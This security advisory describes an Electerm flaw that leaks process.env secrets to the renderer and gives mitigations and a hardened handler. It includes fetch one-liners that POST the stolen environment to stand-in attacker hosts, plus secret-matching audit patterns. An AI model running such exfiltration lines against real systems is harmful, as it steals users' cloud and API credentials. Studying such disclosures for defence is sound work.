Electerm, Information Disclosure, CVE-TBD (Critical)


The vulnerability resides in the `getConstants()` IPC handler defined in `src/app/lib/ipc-sync.js`. This handler, exposed to the renderer process, serializes the entire `process.env` object without any filtering or sanitization. The serialized data is then sent to the renderer and stored as `window.pre.env`, making it accessible to any JavaScript code running in that context.

On developer or CI/CD machines, `process.env` commonly contains highly sensitive secrets such as `AWS_SECRET_ACCESS_KEY`, `AWS_SESSION_TOKEN`, `GITHUB_TOKEN`, `NPM_TOKEN`, `OPENAI_API_KEY`, `DOCKER_AUTH`, database URLs, and internal service credentials. An attacker who achieves arbitrary JavaScript execution within the renderer (e.g., via a malicious plugin, an XSS flaw, or the terminal hyperlink execution chain) can trivially read `window.pre.env` and exfiltrate all secrets to a remote server. Even without code execution, simply opening the “Info” modal in the application exposes these secrets, though that requires local access.

The exposure is silent, persistent, and leads directly to cloud account compromise, supply chain poisoning, and lateral movement. No authentication or privilege escalation is needed; any renderer-side script can retrieve the environment dump. The flaw is a classic case of sensitive data being leaked through an overly broad IPC interface. Because the application is built on Electron, the renderer is inherently untrusted when third-party plugins or external content are loaded.
Platform: Electerm
Version: All vulnerable
Vulnerability: Env variable leak
Severity: Critical
Date: 2026‑05‑08

Prediction: Patch in Q3 2026

What Undercode Says:

Check whether `window.pre.env` is exposed (run in the DevTools console):

```javascript
console.log(window.pre.env);
```

Simulate exfiltration via fetch:

```javascript
fetch('https://attacker.com/steal', { method: 'POST', body: JSON.stringify(window.pre.env) });
```

Audit running Electerm processes for sensitive environment variables (Linux procps; `pgrep -d,` produces the comma-separated PID list `-p` expects, `-ww` prevents truncation, and only the environments of processes you own are readable):

```shell
ps e -ww -p "$(pgrep -d, -f electerm)" | grep -E 'AWS_|GITHUB_|OPENAI_|DOCKER_'
```

Exploit:

  1. Attacker gains JavaScript execution in the renderer (e.g., by tricking the user into installing a malicious plugin or clicking a crafted terminal hyperlink).
  2. Run: `fetch('https://evil.com/exfil', {method:'POST', body:JSON.stringify(window.pre.env)})`
  3. Alternatively, open DevTools (F12) and type `copy(window.pre.env)` to extract secrets manually.
  4. The stolen credentials allow direct access to cloud consoles, GitHub repos, npm publish rights, or OpenAI accounts.

Protection from this CVE

  • Avoid launching Electerm with any sensitive environment variables. Use `env -i` or a wrapper script that clears `process.env` before starting.
  • Disable remote debugging (--remote-debugging-port must not be used).
  • Never install plugins from untrusted sources; audit all installed plugins for network calls.
  • Block renderer network egress via a local firewall or Electron’s `session` API.
  • Monitor for unexpected `window.pre.env` access using a preload script that overrides getters.
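As an added example (not Electerm's own code), here is a hardened replacement for an IPC handler that returns `process.env` wholesale, together with the preload-side getter monitoring suggested in the protection list above. The allowlist, the key-name heuristic and the sample environment are assumptions.

```javascript
// Keys a terminal renderer plausibly needs (assumed; tune for the real app).
const ENV_ALLOWLIST = ['HOME', 'LANG', 'PATH', 'SHELL', 'TERM', 'USER'];
// Heuristic used only to report what was withheld; the allowlist is the control.
const SECRET_KEY_PATTERN = /SECRET|TOKEN|PASSW|API_KEY|AUTH|CREDENTIAL|PRIVATE|_URL$/i;

// Main process: split the environment into what may cross the IPC boundary
// and the names (never the values) of secret-looking keys that were dropped.
function sanitizeEnv(env, allowlist = ENV_ALLOWLIST) {
  const exposed = {};
  const withheldSecrets = [];
  for (const [key, value] of Object.entries(env)) {
    if (allowlist.includes(key)) exposed[key] = value;
    else if (SECRET_KEY_PATTERN.test(key)) withheldSecrets.push(key);
  }
  return { exposed, withheldSecrets };
}

// Hardened handler shape for getConstants: only allowlisted keys are returned.
function getConstantsSafe(env = process.env) {
  const { exposed, withheldSecrets } = sanitizeEnv(env);
  if (withheldSecrets.length) {
    console.warn('getConstants withheld secret-looking keys:', withheldSecrets.join(', '));
  }
  return { env: exposed };
}

// Preload side: expose `pre.env` on the target (window in Electron) through a
// getter so every read from renderer JavaScript is recorded and reported.
function installMonitoredEnv(target, env, report = console.warn) {
  const accesses = [];
  const frozen = Object.freeze({ ...env });
  const pre = target.pre || (target.pre = {});
  Object.defineProperty(pre, 'env', {
    enumerable: true,
    get() {
      const caller = (new Error().stack.split('\n')[2] || 'unknown').trim();
      accesses.push(caller);
      report('window.pre.env read from', caller);
      return frozen;
    },
  });
  return accesses;
}

// Constructed sample resembling a developer workstation; values are fake.
const SAMPLE_ENV = {
  HOME: '/home/dev', TERM: 'xterm-256color', PATH: '/usr/bin',
  AWS_SECRET_ACCESS_KEY: 'constructed-not-real', GITHUB_TOKEN: 'constructed-not-real',
  DATABASE_URL: 'postgres://user:pw@db.internal/app',
};
```

Note that `DATABASE_URL` is withheld because it is not on the allowlist, not because the heuristic recognised it; the report exists only to make the leak visible during development.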

Impact

Full compromise of any cloud, CI, or source‑code accounts whose tokens are present in process.env. Attackers can push malicious code to internal registries, exfiltrate proprietary source code, run costly LLM API calls, and pivot to internal networks. Supply‑chain attacks against downstream consumers of the compromised developer’s software become trivial.


Sources:

Reported By: github.com